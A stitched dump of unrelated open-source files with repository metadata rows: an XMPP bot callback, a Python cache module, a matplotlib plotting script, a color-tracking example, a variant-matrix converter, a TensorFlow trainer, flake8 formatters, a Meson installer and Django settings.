    if time_queue.has_key(rid):
        if time_queue[rid][1]==iq_obj.getFrom().getResource():
            conn.send(xmpp.protocol.Message(time_queue[rid][0], messages['yourtime']%(time_queue[rid][1], rdisplay), 'groupchat'))
        else:
            conn.send(xmpp.protocol.Message(time_queue[rid][0], messages['time']%(time_queue[rid][1], iq_obj.getFrom().getResource(), rdisplay), 'groupchat'))
def timeerrorCB(conn, iq_obj):
    """Report a failed time query back to the conference room."""
    rid=iq_obj.getID()
    if rid in time_queue:
        room, nick = time_queue[rid]
        text = messages['time_error']%(nick, iq_obj.getFrom().getResource())
        conn.send(xmpp.protocol.Message(room, text, 'groupchat'))
| gpl-2.0 | -6,113,828,099,328,659,000 | 39.271186 | 195 | 0.62016 | false | 2.915337 | false | false | false |
smurfix/pybble | pybble/cache/__init__.py | 1 | 1978 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division, unicode_literals
##
## This is part of Pybble, a WMS (Whatever Management System) based on
## Jinja2/Haml, Werkzeug, Flask, and Optimism.
##
## Pybble is Copyright © 2009-2014 by Matthias Urlichs <[email protected]>,
## it is licensed under the GPLv3. See the file `README.md` for details,
## including an optimistic statements by the author.
##
## This paragraph is auto-generated and may self-destruct at any time,
## courtesy of "make update". The original is in ‘utils/_boilerplate.py’.
## Thus, please do not remove the next line, or insert any blank lines.
##BP
# Cache region mapping; populated lazily from .config on first use.
regions = None
from dogpile.cache.api import NO_VALUE
def keystr(args):
	"""Join the elements of *args* into one '|'-separated cache key string."""
	return '|'.join(map(str, args))
## TODO: add keyword-only region param
## TODO: add keyword-only region param
def delete(*args):
	"""Delete a cache value (or a bunch of them).

	A "*" anywhere in *args* makes this a wildcard delete against the
	backend's key space.  Returns the number of keys removed, or None
	when no cache regions are configured.
	"""
	global regions
	if regions is None:
		# Lazy import; with 'global' above this rebinds the module-level
		# 'regions' name to the configured mapping.
		from .config import regions
	if not regions:
		return
	# TODO: this only works with redis (reaches into the backend client)
	r = regions['default'].backend.client
	n = 0
	if "*" in args:
		# Wildcard delete: keystr keeps the "*" so redis KEYS matches it.
		for k in r.keys(keystr(args)):
			r.delete(k)
			n += 1
	else:
		r.delete(keystr(args))
		n = 1
	return n
def get(*args):
	"""Get a cache value, or NO_VALUE if not set."""
	global regions
	if regions is None:
		# Lazy import that rebinds the module-level 'regions'.
		from .config import regions
	if not regions:
		return NO_VALUE
	r = regions['default']
	return r.get(keystr(args))
def set(val, *args):
	"""Set a cache value. You really should use cached() instead.

	NOTE(review): this deliberately mirrors get()/delete() but shadows
	the builtin set() inside this module.
	"""
	global regions
	if regions is None:
		# Lazy import that rebinds the module-level 'regions'.
		from .config import regions
	if not regions:
		return
	r = regions['default']
	r.set(keystr(args),val)
def cached(func, *args):
	"""Cache this function's result. Runs the function exactly once.

	Falls back to calling *func* directly when no regions are configured.
	"""
	global regions
	if regions is None:
		# Lazy import that rebinds the module-level 'regions'.
		from .config import regions
	if not regions:
		return func()
	r = regions['default']
	return r.get_or_create(keystr(args), func)
| gpl-3.0 | 7,012,280,615,499,374,000 | 24.960526 | 82 | 0.695895 | false | 3.116904 | false | false | false |
natj/bender | paper/figs/fig9.py | 1 | 4141 | import numpy as np
import math
from pylab import *
from palettable.wesanderson import Zissou_5 as wsZ
import matplotlib.ticker as mtick
from scipy.interpolate import interp1d
from scipy.interpolate import griddata
from scipy.signal import savgol_filter
def smooth(xx, yy):
    """Savitzky-Golay smooth *yy* (window 7, polynomial order 2), clamp the
    result into [0, 1000] and pin both endpoints to zero.

    Returns (xx, smoothed_yy); xx is passed through untouched.
    """
    smoothed = savgol_filter(yy, 7, 2)
    np.clip(smoothed, 0.0, 1000.0, out=smoothed)
    smoothed[0] = 0.0
    smoothed[-1] = 0.0
    return xx, smoothed
#Read JN files
def read_lineprof(fname):
da = np.genfromtxt(fname, delimiter=",")
des = np.diff(da[:,0])[2]
norm = np.sum(des*da[:,1])
return da[:,0],da[:,1]/norm
#Read JN files
def read_csv(fname):
da = np.genfromtxt(fname, delimiter=",")
des = np.diff(da[:,0])[2]
norm = np.sum(des*da[:,1])
return da[:,0],da[:,1] #/norm
## Plot: line-profile comparison figure (fig 9); output fig9_testi.pdf.
fig = figure(figsize=(5,3), dpi=80)
rc('font', family='serif')
rc('xtick', labelsize='xx-small')
rc('ytick', labelsize='xx-small')
gs = GridSpec(1, 1)
#gs.update(wspace = 0.34)
#gs.update(hspace = 0.4)
lsize = 10.0
# x-axis (energy ratio) window
xmin = 0.69
xmax = 0.82
#error window limits
eymin = -0.5
eymax = 0.5
#path to files
#path_JN = "../../out3/lines/"
path_JN = "../../out/lines2/"
#labels size
tsize = 10.0
nu = '700'
#fig.text(0.5, 0.92, '$\\theta_s = 18^{\\circ}$', ha='center', va='center', size=tsize)
#fig.text(0.5, 0.72, '$\\theta_s = 45^{\\circ}$', ha='center', va='center', size=tsize)
#fig.text(0.5, 0.52, '$\\theta_s = 90^{\\circ}$', ha='center', va='center', size=tsize)
#fig.text(0.5, 0.32, 'Hopf $\\theta_s = 45^{\circ}$', ha='center', va='center', size=tsize)
#fig.text(0.5, 0.12, 'Phase',ha='center', va='center', size=lsize)
ax1 = subplot(gs[0,0])
ax1.minorticks_on()
ax1.set_xlim(xmin, xmax)
ax1.set_ylim(0.0, 30)
ax1.set_ylabel('Normalized flux',size=lsize)
ax1.set_xlabel('Energy $E/E\'$',size=lsize)
#xx1, yy1 = read_lineprof(path_JN+'lineprof_f700pbbr10m1.4i20.csv')
#ax1.plot(xx1, yy1, "k--")
#xx2, yy2 = read_lineprof(path_JN+'lineprof_obl_HTq0_f700pbbr10m1.4i20.csv')
#ax1.plot(xx2, yy2, "k-")
#lineprof_obl_HTq3_f700pbbr10m1.4i20.csv
#lineprof_obl_HTq5_f700pbbr10m1.4i20.csv
#lineprof_obl_HTq2_f700pbbr10m1.4i20.csv
files_JN = [
    "lineprof_f700pbbr10m1.4i20.csv",
    "lineprof_obl_f700pbbr10m1.4i20.csv",
    #"lineprof_sph2_HTqfix_f700pbbr10m1.4i20.csv"]
    #"lineprof_obl_HTq0_f700pbbr10m1.4i20.csv",
    "lineprof_obl_HTq1_f700pbbr10m1.4i20.csv"]
    #"lineprof_obl_HTq4_f700pbbr10m1.4i20.csv"]
# NOTE(review): the list above is immediately overridden by this one.
files_JN = ['sch/lineprofile_f700_bb_r10_m1.4_i20.csv',
            'obl/lineprofile_f700_bb_r10_m1.4_i20.csv',
            'q/lineprofile_f700_bb_r10_m1.4_i20.csv']
cols = ["black",
        "blue",
        "red",
        "magenta"]
# Solid curves: smoothed, normalized JN line profiles.
i = 0
for file_name in files_JN:
    xx, yy = read_lineprof(path_JN+file_name)
    xx, yy = smooth(xx, yy)
    ax1.plot(xx, yy, color=cols[i], linestyle="solid")
    i += 1
#path_JN = "../../out3/lines/"
# Dashed red curve: the q*4 variant from the older output directory.
xx, yy = read_lineprof("../../out3/lines/lineprof_obl_HTq4_f700pbbr10m1.4i20.csv")
ax1.plot(xx, yy, color="red", linestyle="dashed")
#files_Bau = [
#"sch+dopp.csv",
#"sch+dopp+obl.csv",
#"HT.csv",
#"HT_obl.csv"]
files_Bau = ['sch.csv', 'obl.csv', 'ht.csv']
# Comparison curves (currently disabled; data is read but not plotted).
i = 0
for file_name in files_Bau:
    xx, yy = read_csv(path_JN+file_name)
    #rescale xx for correct scaling
    #xx = (xx-0.72)/(0.89-0.72)*(0.8-0.72) + 0.72
    #ax1.plot(xx, yy, color=cols[i], linestyle="dashed")
    i += 1
############ q's
#xx3, yy3 = read_lineprof(path_JN+'lineprof_obl_HTq1_f700pbbr10m1.4i20.csv')
#ax1.plot(xx3, yy3, "k-", label="$q = -0.268$")
#
#xx4, yy4 = read_lineprof(path_JN+'lineprof_obl_HTq2_f700pbbr10m1.4i20.csv')
#ax1.plot(xx4, yy4, "r-", label="$q \\times 2$")
#
#xx5, yy5 = read_lineprof(path_JN+'lineprof_obl_HTq3_f700pbbr10m1.4i20.csv')
#ax1.plot(xx5, yy5, "g-", label="$q \\times 3$")
#
#xx6, yy6 = read_lineprof(path_JN+'lineprof_obl_HTq4_f700pbbr10m1.4i20.csv')
#ax1.plot(xx6, yy6, "b-", label="$q \\times 4$")
#
#xx7, yy7 = read_lineprof(path_JN+'lineprof_obl_HTq5_f700pbbr10m1.4i20.csv')
#ax1.plot(xx7, yy7, "m-", label="$q \\times 5$")
#
#legend = ax1.legend(loc='upper left', shadow=False, labelspacing=0.1)
#for label in legend.get_texts():
#    label.set_fontsize('x-small')
savefig('fig9_testi.pdf', bbox_inches='tight')
| mit | 426,456,998,150,507,200 | 23.358824 | 92 | 0.63632 | false | 2.155648 | false | false | false |
gaborvecsei/Color-Tracker | examples/tracking.py | 1 | 2306 | import argparse
from functools import partial
import cv2
import color_tracker
# You can determine these values with the HSVColorRangeDetector()
# HSV bounds (H, S, V) for the color being tracked.
HSV_LOWER_VALUE = [155, 103, 82]
HSV_UPPER_VALUE = [178, 255, 255]
def get_args(argv=None):
    """Parse the tracker demo's command-line options.

    Args:
        argv: Optional list of argument strings.  Defaults to None, in
            which case argparse falls back to sys.argv[1:] (the previous
            behavior); passing an explicit list makes this testable.

    Returns:
        argparse.Namespace with ``low``, ``high``, ``contour_area`` and
        ``verbose`` attributes.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-low", "--low", nargs=3, type=int, default=HSV_LOWER_VALUE,
                        help="Lower value for the HSV range. Default = 155, 103, 82")
    parser.add_argument("-high", "--high", nargs=3, type=int, default=HSV_UPPER_VALUE,
                        help="Higher value for the HSV range. Default = 178, 255, 255")
    parser.add_argument("-c", "--contour-area", type=float, default=2500,
                        help="Minimum object contour area. This controls how small objects should be detected. Default = 2500")
    parser.add_argument("-v", "--verbose", action="store_true")
    return parser.parse_args(argv)
def tracking_callback(tracker: color_tracker.ColorTracker, verbose: bool = True):
    """Per-frame callback: show the debug windows and optionally log objects.

    Pressing ESC in either window stops the tracking loop.
    """
    # Visualizing the original frame and the debugger frame
    cv2.imshow("original frame", tracker.frame)
    cv2.imshow("debug frame", tracker.debug_frame)

    # Stop the script when we press ESC (key code 27)
    key = cv2.waitKey(1)
    if key == 27:
        tracker.stop_tracking()

    if verbose:
        for obj in tracker.tracked_objects:
            print("Object {0} center {1}".format(obj.id, obj.last_point))
def main():
    """Wire everything up: parse args, build the kernel, start tracking."""
    args = get_args()

    # Creating a kernel for the morphology operations
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))

    # Init the ColorTracker object
    tracker = color_tracker.ColorTracker(max_nb_of_objects=5, max_nb_of_points=20, debug=True)

    # Setting a callback which is called at every iteration
    callback = partial(tracking_callback, verbose=args.verbose)
    tracker.set_tracking_callback(tracking_callback=callback)

    # Start tracking with a camera (device 0); blocks until stopped.
    with color_tracker.WebCamera(video_src=0) as webcam:
        # Start the actual tracking of the object
        tracker.track(webcam,
                      hsv_lower_value=args.low,
                      hsv_upper_value=args.high,
                      min_contour_area=args.contour_area,
                      kernel=kernel)
# Script entry point.
if __name__ == "__main__":
    main()
| mit | -4,765,477,397,888,369,000 | 34.476923 | 127 | 0.647008 | false | 3.737439 | false | false | false |
jefftc/changlab | Betsy/Betsy/modules/convert_simplevariantfile_to_matrix.py | 1 | 8224 | from Module import AbstractModule
class Module(AbstractModule):
    """Convert a simple-variant text file into a SimpleVariantMatrix file.

    Reads per-call rows (chrom/pos/ref/alt/sample/caller/coverage/VAF),
    collapses duplicates, and writes an annotation matrix with one row per
    coordinate and per-sample/per-caller call columns.
    """

    def __init__(self):
        AbstractModule.__init__(self)

    def run(
        self, network, in_data, out_attributes, user_options, num_cores,
        out_filename):
        """Build the variant matrix from in_data and write it to out_filename.

        Returns a (currently empty) metadata dict, as required by the
        AbstractModule interface.
        """
        from genomicode import filelib
        from genomicode import SimpleVariantMatrix
        from genomicode import AnnotationMatrix

        simple_file = in_data.identifier
        metadata = {}

        # Read all in memory.  Hopefully, not too big.
        ds = []
        for d in filelib.read_row(simple_file, header=-1):
            ds.append(d)
            #if len(ds) > 50000:  # DEBUG
            #    break

        # MuSE sometimes has alternates, e.g.:
        #   Alt      A,C
        #   Num_Alt  13,0
        #   VAF      0.19,0.0
        # Detect this and fix it.  Take the alternate with the highest VAF.
        for d in ds:
            if d.Num_Alt.find(",") < 0:
                continue
            x1 = d.Num_Alt.split(",")
            x2 = d.VAF.split(",")
            assert len(x1) == len(x2)
            # NOTE(review): map() + later indexing implies Python 2
            # semantics (map returns a list there).
            x1 = map(int, x1)
            x2 = map(float, x2)
            max_vaf = max_i = None
            for i in range(len(x2)):
                if max_vaf is None or x2[i] > max_vaf:
                    max_vaf = x2[i]
                    max_i = i
            assert max_i is not None
            d.Num_Alt = str(x1[max_i])
            d.VAF = str(x2[max_i])

        # Make a list of all the positions.
        # NOTE(review): 'positions' is computed but never used below;
        # coord_data is what drives the output.
        positions = {}  # (Chrom, Pos) -> 1
        for d in ds:
            positions[(d.Chrom, int(d.Pos))] = 1
        positions = sorted(positions)

        # Make a list of all the callers.
        callers = {}
        for d in ds:
            callers[d.Caller] = 1
        callers = sorted(callers)

        # Make a list of all the samples.
        samples = {}
        for d in ds:
            samples[d.Sample] = 1
        samples = sorted(samples)

        # Make a list of the coordinates.
        coord_data = {}
        for d in ds:
            x = d.Chrom, int(d.Pos), d.Ref, d.Alt
            coord_data[x] = 1
        coord_data = sorted(coord_data)

        # Make a list of all DNA calls (RNA rows are skipped).
        call_data = []
        for d in ds:
            assert d.Source in ["DNA", "RNA"]
            if d.Source != "DNA":
                continue
            num_ref = num_alt = vaf = None
            if d.Num_Ref:
                num_ref = int(d.Num_Ref)
            if d.Num_Alt:
                num_alt = int(d.Num_Alt)
            if d.VAF:
                vaf = float(d.VAF)
            # Skip rows with no usable numbers at all.
            if num_ref is None and num_alt is None and vaf is None:
                continue
            call = SimpleVariantMatrix.Call(num_ref, num_alt, vaf)
            x = d.Chrom, int(d.Pos), d.Ref, d.Alt, d.Sample, d.Caller, call
            call_data.append(x)

        # sample -> caller -> chrom, pos, ref, alt -> call
        samp2caller2coord2call = {}
        for x in call_data:
            chrom, pos, ref, alt, sample, caller, call = x
            coord = chrom, pos, ref, alt
            if sample not in samp2caller2coord2call:
                samp2caller2coord2call[sample] = {}
            caller2coord2call = samp2caller2coord2call[sample]
            if caller not in caller2coord2call:
                caller2coord2call[caller] = {}
            coord2call = caller2coord2call[caller]
            # A (sample, caller, coord) may have multiple calls.  For
            # example, for germline samples that are called with each
            # tumor sample.  If this is the case, then take the call
            # with the highest coverage.
            if coord in coord2call:
                old_call = coord2call[coord]
                cov = old_cov = None
                if call.num_ref is not None and call.num_alt is not None:
                    cov = call.num_ref + call.num_alt
                if old_call.num_ref is not None and \
                   old_call.num_alt is not None:
                    old_cov = old_call.num_ref + old_call.num_alt
                # Keep the previous call when it has known (or higher)
                # coverage.
                if cov is None and old_cov is not None:
                    call = old_call
                elif cov is not None and old_cov is not None and cov < old_cov:
                    call = old_call
            coord2call[coord] = call

        # Count the number of callers that called a variant at each
        # position for each sample.
        samp2coord2caller = {}  # sample -> chrom, pos, ref, alt -> caller -> 1
        # Need to do this first, to make sure each caller is counted
        # at most once.  This is to account for germline samples that
        # is called by each caller multiple times.
        for x in call_data:
            chrom, pos, ref, alt, sample, caller, call = x
            coord = chrom, pos, ref, alt
            if sample not in samp2coord2caller:
                samp2coord2caller[sample] = {}
            if coord not in samp2coord2caller[sample]:
                samp2coord2caller[sample][coord] = {}
            samp2coord2caller[sample][coord][caller] = 1
        samp2coord2nc = {}  # sample -> chrom, pos, ref, alt -> num_callers
        for sample in samp2coord2caller:
            samp2coord2nc[sample] = {}
            for coord in samp2coord2caller[sample]:
                samp2coord2nc[sample][coord] = len(
                    samp2coord2caller[sample][coord])
        #for x in call_data:
        #    chrom, pos, ref, alt, sample, caller, call = x
        #    coord = chrom, pos, ref, alt
        #    if sample not in samp2coord2nc:
        #        samp2coord2nc[sample] = {}
        #    nc = samp2coord2nc[sample].get(coord, 0) + 1
        #    samp2coord2nc[sample][coord] = nc

        # Format everything into an annotation matrix.  Three header rows
        # (headers0/1/2) are later fused with "___" into single names.
        headers0 = []
        headers1 = []
        headers2 = []
        all_annots = []

        # Add the positions.
        headers0 += ["", "", "", ""]
        headers1 += ["", "", "", ""]
        headers2 += ["Chrom", "Pos", "Ref", "Alt"]
        for i in range(4):
            x = [x[i] for x in coord_data]
            x = [str(x) for x in x]
            all_annots.append(x)

        # Add the number of callers information.
        headers0 += ["Num Callers"] * len(samples)
        headers1 += [""] * len(samples)
        headers2 += samples
        for sample in samples:
            annots = []
            for coord in coord_data:
                nc = samp2coord2nc.get(sample, {}).get(coord, "")
                annots.append(nc)
            all_annots.append(annots)

        # Add information about calls, one column per (sample, caller).
        for sample in samples:
            caller2coord2call = samp2caller2coord2call.get(sample, {})
            for i, caller in enumerate(callers):
                h0 = ""
                if not i:
                    # Sample name appears only on the first caller column.
                    h0 = sample
                h1 = caller
                h2 = "Ref/Alt/VAF"
                headers0.append(h0)
                headers1.append(h1)
                headers2.append(h2)
                coord2call = caller2coord2call.get(caller, {})
                annots = []
                for coord in coord_data:
                    x = ""
                    call = coord2call.get(coord)
                    if call:
                        x = SimpleVariantMatrix._format_call(call)
                    annots.append(x)
                all_annots.append(annots)

        # Set the headers.
        assert len(headers0) == len(headers1)
        assert len(headers0) == len(headers2)
        assert len(headers0) == len(all_annots)
        headers = [None] * len(headers0)
        for i, x in enumerate(zip(headers0, headers1, headers2)):
            x = "___".join(x)
            headers[i] = x
        matrix = AnnotationMatrix.create_from_annotations(headers, all_annots)
        SimpleVariantMatrix.write_from_am(out_filename, matrix)

        #annot_header = ["Chrom", "Pos", "Ref", "Alt"]
        #matrix = SimpleVariantMatrix.make_matrix(
        #    samples, callers, annot_header, coord_data, named_data,
        #    call_data)
        #SimpleVariantMatrix.write(out_filename, matrix)

        return metadata

    def name_outfile(self, antecedents, user_options):
        """Name of the output file produced by run()."""
        return "calls.txt"
| mit | 3,985,949,250,645,467,600 | 36.552511 | 79 | 0.508512 | false | 3.812703 | false | false | false |
dzorlu/sdc-segmentation | train.py | 1 | 4118 | import sys
import tensorflow as tf
from tensorflow.python.ops import math_ops
# Make the TF-Slim research code importable before using slim below.
sys.path.append("slim/")
slim = tf.contrib.slim
# Directory where checkpoints and summaries are written.
TRAIN_DIR = "/tmp/tf"
class Trainer(object):
  """Builds and runs a TF-Slim training loop for semantic segmentation.

  Typical use: construct with the number of classes, an optimizer class
  and a learning rate, call build() with the network's logits and labels,
  then train() with the dataset iterator.
  """

  def __init__(self, nb_classes, optimizer, learning_rate):
    """`optimizer` is an optimizer *class*; it is instantiated here with
    `learning_rate` (which may be a placeholder tensor)."""
    self.nb_classes = nb_classes
    # learning rate can be a placeholder tensor
    self.learning_rate = learning_rate
    self.optimizer = optimizer(learning_rate)
    self.train_op = None
    self.prediction = None

  def build(self, predictions, labels, one_hot=False):
    """Create the softmax cross-entropy loss and the train op.

    Args:
      predictions: logits tensor from the network.
      labels: integer label map (one_hot=True) or pre-encoded labels that
        can be reshaped to (-1, nb_classes) (one_hot=False).
      one_hot: when True, labels are one-hot encoded here and the logits
        are bilinearly resized to the label resolution.
    """
    with tf.name_scope('training'):
      if one_hot:
        labels = tf.one_hot(labels, depth=self.nb_classes)
        labels = tf.squeeze(labels, axis=2)
        label_shape = tf.shape(labels)[:2]
        predictions = tf.image.resize_bilinear(predictions, label_shape, name='resize_predictions')
      else:
        # BUG FIX: was 'self.nb_clasess' (typo), which raised
        # AttributeError whenever one_hot=False.
        labels = tf.reshape(labels, (-1, self.nb_classes))
        predictions = tf.reshape(predictions, (-1, self.nb_classes))
      self.prediction = predictions
      labels = tf.expand_dims(labels, 0)
      print("pred shape {}, label shape {}".format(predictions.get_shape(), labels.get_shape()))
      # wraps the softmax_with_entropy fn. adds it to loss collection
      tf.losses.softmax_cross_entropy(logits=predictions, onehot_labels=labels)
      # include the regularization losses in the loss collection.
      total_loss = tf.losses.get_total_loss()
      self.train_op = slim.learning.create_train_op(total_loss,
                                                    optimizer=self.optimizer)

  def add_summaries(self):
    """Add image, variable and loss summaries; return the merged op."""
    global_summaries = set([])
    # image summary (the raw input batch from the dataset iterator)
    image_summary = tf.get_default_graph().get_tensor_by_name('IteratorGetNext:0')
    image_summary = tf.expand_dims(image_summary, 0)
    image_summary = tf.summary.image('image', image_summary)
    global_summaries.add(image_summary)
    # prediction summary (argmax over classes, rendered as an image)
    prediction = tf.argmax(self.prediction, axis=3)
    prediction = tf.cast(prediction, tf.float32)
    prediction = tf.expand_dims(prediction, 3)
    image_summary = tf.summary.image('prediction', prediction)
    global_summaries.add(image_summary)
    for model_var in slim.get_model_variables():
      global_summaries.add(tf.summary.histogram(model_var.op.name, model_var))
    # total loss
    total_loss_tensor = tf.get_default_graph().get_tensor_by_name('training/total_loss:0')
    global_summaries.add(tf.summary.scalar(total_loss_tensor.op.name, total_loss_tensor))
    # Merge all summaries together.
    summary_op = tf.summary.merge(list(global_summaries), name='summary_op')
    return summary_op

  def train(self, iterator,
            filename,
            restore_fn=None,
            _add_summaries=True,
            number_of_steps=10000,
            save_interval_secs=12000,
            same_summaries_secs=120,
            keep_checkpoint_every_n_hours=5):
    """Run slim.learning.train with checkpointing and summaries.

    Args:
      iterator: dataset iterator whose initializer is fed `filename`.
      filename: value fed to the 'training_data/input:0' placeholder.
      restore_fn: optional fn(sess) to restore weights from a checkpoint.
      _add_summaries: whether to build and write summaries.
      number_of_steps: total training steps.
      save_interval_secs: seconds between checkpoint saves.
      same_summaries_secs: seconds between summary saves.  (Name kept,
        despite the 'save'->'same' typo, for caller compatibility.)
      keep_checkpoint_every_n_hours: checkpoint retention policy.
    """
    summary_op = None
    if _add_summaries:
      summary_op = self.add_summaries()
    # Save checkpoints regularly.
    saver = tf.train.Saver(
      keep_checkpoint_every_n_hours=keep_checkpoint_every_n_hours)
    # init fn for the dataset ops and checkpointing
    def initializer_fn(sess):
      input_tensor = tf.get_default_graph().get_tensor_by_name('training_data/input:0')
      sess.run(iterator.initializer, feed_dict={input_tensor: filename})
      if restore_fn:
        restore_fn(sess)
    init_fn = initializer_fn
    # Soft placement allows placing on CPU ops without GPU implementation.
    session_config = tf.ConfigProto(allow_soft_placement=True,
                                    log_device_placement=False)
    # train
    slim.learning.train(train_op=self.train_op,
                        logdir=TRAIN_DIR,
                        session_config=session_config,
                        summary_op=summary_op,
                        init_fn=init_fn,
                        save_interval_secs=save_interval_secs,
                        number_of_steps=number_of_steps,
                        save_summaries_secs=same_summaries_secs,
                        saver=saver)
| mit | 8,798,008,712,275,257,000 | 41.453608 | 99 | 0.639631 | false | 3.830698 | false | false | false |
Aorjoa/aiyara-ceph-dash | .tox/flake8/lib/python2.7/site-packages/flake8/formatting/default.py | 1 | 2191 | """Default formatting class for Flake8."""
from flake8.formatting import base
class SimpleFormatter(base.BaseFormatter):
    """Simple abstraction for Default and Pylint formatter commonality.

    Sub-classes of this need to define an ``error_format`` attribute in order
    to succeed. The ``format`` method relies on that attribute and expects the
    ``error_format`` string to use the old-style formatting strings with named
    parameters:

    * code
    * text
    * path
    * row
    * col

    """

    error_format = None

    def format(self, error):
        """Format and write error out.

        If an output filename is specified, write formatted errors to that
        file. Otherwise, print the formatted error to standard out.
        """
        substitutions = {
            "code": error.code,
            "text": error.text,
            "path": error.filename,
            "row": error.line_number,
            "col": error.column_number,
        }
        return self.error_format % substitutions
class Default(SimpleFormatter):
    """Default formatter for Flake8.

    This also handles backwards compatibility for people specifying a custom
    format string.
    """

    error_format = '%(path)s:%(row)d:%(col)d: %(code)s %(text)s'

    def after_init(self):
        """Check for a custom format string."""
        custom_format = self.options.format
        if custom_format.lower() != 'default':
            self.error_format = custom_format
class Pylint(SimpleFormatter):
    """Pylint formatter for Flake8."""

    # Pylint-compatible "path:line: [code] message" layout.
    error_format = '%(path)s:%(row)d: [%(code)s] %(text)s'
class FilenameOnly(SimpleFormatter):
    """Only print filenames, e.g., flake8 -q."""

    error_format = '%(path)s'

    def after_init(self):
        """Initialize our set of filenames."""
        self.filenames_already_printed = set()

    def format(self, error):
        """Ensure we only print each error once."""
        if error.filename in self.filenames_already_printed:
            # Already reported this file; emit nothing for this error.
            return None
        self.filenames_already_printed.add(error.filename)
        return super(FilenameOnly, self).format(error)
class Nothing(base.BaseFormatter):
    """Print absolutely nothing."""

    def format(self, error):
        """Do nothing."""
        pass
| bsd-2-clause | -733,534,517,707,735,400 | 26.3875 | 78 | 0.624829 | false | 4.181298 | false | false | false |
WisniewskiP/meson | install_meson.py | 1 | 3639 | #!/usr/bin/env python3
# Copyright 2013-2014 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script installs Meson. We can't use Meson to install itself
# because of the bootstrap problem. We can't use any other build system
# either becaust that would be just silly.
import os, sys, glob, shutil, gzip
from optparse import OptionParser

# Command line interface: both options are optional and default to a
# system-wide installation.
usage_info = '%prog [--prefix PREFIX] [--destdir DESTDIR]'
parser = OptionParser(usage=usage_info)
parser.add_option('--prefix', default='/usr/local', dest='prefix',
                  help='the installation prefix (default: %default)')
parser.add_option('--destdir', default='', dest='destdir',
                  help='the destdir (default: %default)')
# parse_args() defaults to sys.argv[1:]; the previous code passed sys.argv
# whole, which made OptionParser treat argv[0] (this script's own path) as a
# positional argument.
(options, args) = parser.parse_args()

if options.prefix[0] != '/':
    print('Error, prefix must be an absolute path.')
    sys.exit(1)

# DESTDIR is grafted in front of the prefix (the usual staged-install idiom).
if options.destdir == '':
    install_root = options.prefix
else:
    install_root = os.path.join(options.destdir, options.prefix[1:])

# Layout of the installed tree: scripts in share/meson, symlinks in bin,
# compressed man pages in share/man/man1.
script_dir = os.path.join(install_root, 'share/meson')
bin_dir = os.path.join(install_root, 'bin')
bin_script = os.path.join(script_dir, 'meson.py')
gui_script = os.path.join(script_dir, 'mesongui.py')
conf_script = os.path.join(script_dir, 'mesonconf.py')
bin_name = os.path.join(bin_dir, 'meson')
gui_name = os.path.join(bin_dir, 'mesongui')
conf_name = os.path.join(bin_dir, 'mesonconf')
man_dir = os.path.join(install_root, 'share/man/man1')

in_manfile = 'man/meson.1'
out_manfile = os.path.join(man_dir, 'meson.1.gz')
in_guimanfile = 'man/mesongui.1'
out_guimanfile = os.path.join(man_dir, 'mesongui.1.gz')
in_confmanfile = 'man/mesonconf.1'
out_confmanfile = os.path.join(man_dir, 'mesonconf.1.gz')

# The bin entries are relative symlinks pointing into share/meson.
symlink_value = os.path.relpath(bin_script, os.path.dirname(bin_name))
guisymlink_value = os.path.relpath(gui_script, os.path.dirname(gui_name))
confsymlink_value = os.path.relpath(conf_script, os.path.dirname(conf_name))

# Install every Python/UI file except the development-only helpers.
files = glob.glob('*.py')
files += glob.glob('*.ui')
noinstall = ['compile_meson.py', 'install_meson.py', 'run_tests.py', 'run_cross_test.py']
files = [x for x in files if x not in noinstall]

os.makedirs(script_dir, exist_ok=True)
os.makedirs(bin_dir, exist_ok=True)
os.makedirs(man_dir, exist_ok=True)

for f in files:
    print('Installing %s to %s.' %(f, script_dir))
    outfilename = os.path.join(script_dir, f)
    shutil.copyfile(f, outfilename)
    shutil.copystat(f, outfilename)

print('Creating symlinks %s and %s.' % (bin_name, gui_name))
# Remove any stale links first. A missing link is fine; anything else in the
# way (e.g. a directory) should fail loudly when symlink() runs. The previous
# code also did a redundant os.remove(bin_name) immediately before unlinking
# the very same path.
for link_name in (bin_name, gui_name, conf_name):
    try:
        os.unlink(link_name)
    except FileNotFoundError:
        pass
os.symlink(symlink_value, bin_name)
os.symlink(guisymlink_value, gui_name)
os.symlink(confsymlink_value, conf_name)

print('Installing manfiles to %s.' % man_dir)
# Compress the man pages. `with` guarantees the handles are closed promptly;
# the previous one-liners relied on refcounting of anonymous file objects.
for in_page, out_page in ((in_manfile, out_manfile),
                          (in_confmanfile, out_confmanfile),
                          (in_guimanfile, out_guimanfile)):
    with open(in_page, 'rb') as infile:
        data = infile.read()
    with open(out_page, 'wb') as outfile:
        outfile.write(gzip.compress(data))
| apache-2.0 | -5,287,735,341,432,281,000 | 35.029703 | 89 | 0.710085 | false | 3.004955 | false | false | false |
Gricha/django-empty | django-empty-auth/newproject/settings.py | 1 | 3305 | """
Django settings for newproject project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Machine-specific and secret values (keys, DB credentials, debug flags) are
# kept out of version control in settings_local.
from newproject.settings_local import (
    SECRET_KEY,
    DEBUG,
    LESSC_PATH,
    USE_SYSLOG,
    TEMPLATE_DEBUG,
    ALLOWED_HOSTS,
    COMPRESS_ENABLED,
    DATABASES,
    ADMINS)
# Custom auth backend so the project can authenticate against its own
# CustomUser model (declared below).
AUTHENTICATION_BACKENDS = (
    'newproject.auth_backends.CustomUserModelBackend',
)
TEMPLATE_CONTEXT_PROCESSORS = (
    "django.contrib.auth.context_processors.auth",
    "django.core.context_processors.debug",
    "django.core.context_processors.i18n",
    "django.core.context_processors.media",
    "django.core.context_processors.static",
    "django.core.context_processors.tz",
    "django.contrib.messages.context_processors.messages",
    'django.core.context_processors.request',)
AUTH_PROFILE_MODULE = 'newproject.apps.account.CustomUser'
